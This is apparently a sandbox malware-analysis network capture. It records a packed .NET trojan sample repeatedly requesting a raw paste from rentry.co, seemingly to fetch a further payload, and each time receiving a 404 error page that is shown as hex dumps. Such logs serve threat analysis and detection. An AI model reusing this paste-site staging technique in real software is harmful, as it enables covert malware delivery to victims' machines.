                                                                                        2024-10-18 10:42:12 UTC694INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:12 UTC1369INData Raw: 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e
                                                                                        Data Ascii: 2.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing.
                                                                                        2024-10-18 10:42:12 UTC1369INData Raw: 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d
                                                                                        Data Ascii: g' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-sm
                                                                                        2024-10-18 10:42:12 UTC1028INData Raw: 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 39 37 62 65 66 31 65 38 30 33 27 2c 74 3a 27 4d 54 63
                                                                                        Data Ascii: c="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb97bef1e803',t:'MTc
                                                                                        2024-10-18 10:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.660624104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:14 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:15 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:14 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR4gAVDBnrkgjgQaWzhppgZ%2BNtW7EEOKFyyM6q0swHi9%2BoCrW5dVSmWPPycFkFhRZ0r%2B8VrwH2pBZRz5C6AWZysH7yYUDxXSYUuFgIq376WhCGbYtkWPW3DS5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ebaa59d06c53-DFW
                                                                                        2024-10-18 10:42:15 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:15 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:42:15 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:15 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 61 61 35 39 64 30 36 63 35 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 7a 4e 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ebaa59d06c53',t:'MTcyOTI0ODEzNC4wMDAwMD
                                                                                        2024-10-18 10:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.660626104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:17 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:17 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:17 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0DCKKKvaXEldCTQ%2FodSWUtFfj6y%2FUFrrQaB2CgbhmJse9UvOiBP2TDHhuR5UepHF%2FLpVfvTSuoauKBaUvUoUHsqdMtIJV9ItqkK1BfAG3q958TXoLEGpYfWrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ebbcca2cddac-DFW
                                                                                        2024-10-18 10:42:17 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:17 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:42:17 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:17 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 62 63 63 61 32 63 64 64 61 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 7a 4e 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ebbcca2cddac',t:'MTcyOTI0ODEzNy4wMDAwMD
                                                                                        2024-10-18 10:42:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.660629104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:20 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:21 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:21 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mIxQ2HJOHQiaAFmx%2FHDrijCHv27PPGa8D9hhHPf5LATNy39nCsqyDCcNPRrnzIBU%2B4GYNRcr0FKYCRzM6jHnXx%2FHev2icGDI%2FagXaTLhjfvgEIOERSQuLYQHlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ebcf08a70bdd-DFW
                                                                                        2024-10-18 10:42:21 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:21 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:42:21 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:21 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 63 66 30 38 61 37 30 62 64 64 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 30 4d 53 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ebcf08a70bdd',t:'MTcyOTI0ODE0MS4wMDAw
                                                                                        2024-10-18 10:42:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.660631104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:23 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:24 UTC677INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:24 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9SHC2UvOTBNKn9SsL6Sv4%2FWO0PGnafD3mXn2r%2BGdnmoG275Jl23jh2bRSIctz3VuoWVQLq7VxpnQb18386uZd4G1eY4uLqCu6rriJp0sxHbfVoOy4YdUWj7bQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ebe42d062d2d-DFW
